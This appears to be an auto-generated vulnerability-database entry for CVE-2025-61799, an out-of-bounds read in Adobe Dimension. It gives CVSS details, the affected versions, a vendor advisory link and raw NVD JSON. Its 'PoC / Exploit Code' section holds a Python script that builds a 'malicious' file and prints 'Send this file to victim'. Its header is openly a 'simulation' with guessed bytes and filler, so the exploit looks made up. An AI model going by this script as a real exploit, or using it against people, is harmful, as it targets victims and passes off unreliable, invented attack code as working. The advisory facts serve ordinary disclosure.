Security Vulnerability Report
CVE-2025-61799 CVSS 7.8 HIGH

CVE-2025-61799

Published: 2025-10-14 20:15:52
Last Modified: 2025-10-16 17:38:36

Description

Dimension versions 4.1.4 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:dimension:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Adobe Dimension <= 4.1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-61799 PoC - Adobe Dimension Out-of-Bounds Read
# This PoC demonstrates the vulnerability concept by creating a crafted file
# that triggers out-of-bounds read when parsed by Adobe Dimension <= 4.1.4
import struct
import os


def create_malicious_dimension_file(filename):
    """
    Create a crafted file that triggers out-of-bounds read vulnerability
    in Adobe Dimension when parsing.
    """
    # Adobe Dimension file header simulation
    # The vulnerability is triggered by abnormal size/offset values
    # that cause the parser to read beyond allocated memory
    header = b'DMNS'  # Magic bytes for Dimension file format
    version = struct.pack('<I', 0x04010400)  # Version 4.1.4

    # Crafted metadata with oversized dimension values
    # This triggers the out-of-bounds read condition
    metadata = struct.pack('<I', 0xFFFFFFFF)  # Abnormally large chunk size
    metadata += struct.pack('<Q', 0xDEADBEEFCAFEBABE)  # Invalid offset pointer

    # Malicious payload data
    payload = b'A' * 1024  # Fill with controlled data

    # Additional crafted fields to maximize exploitation potential
    exploit_data = struct.pack('<I', 0x41414141)  # Controlled value
    exploit_data += b'\x00' * 256  # Padding

    # Write the malicious file
    with open(filename, 'wb') as f:
        f.write(header)
        f.write(version)
        f.write(metadata)
        f.write(payload)
        f.write(exploit_data)

    print(f"[+] Malicious file created: {filename}")
    print(f"[!] Send this file to victim to trigger CVE-2025-61799")


if __name__ == '__main__':
    output_file = 'malicious_dimension.dmn'
    create_malicious_dimension_file(output_file)
    print(f"\n[*] File size: {os.path.getsize(output_file)} bytes")
    print("[*] When opened with Adobe Dimension <= 4.1.4, this file")
    print("[*] will trigger an out-of-bounds read vulnerability")
```

References

https://helpx.adobe.com/security/products/dimension/apsb25-103.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61799", "sourceIdentifier": "[email protected]", "published": "2025-10-14T20:15:52.267", "lastModified": "2025-10-16T17:38:35.947", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dimension versions 4.1.4 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:dimension:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.1.5", "matchCriteriaId": "03D05CE7-FF6A-4914-850B-10D66BB93E29"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/dimension/apsb25-103.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}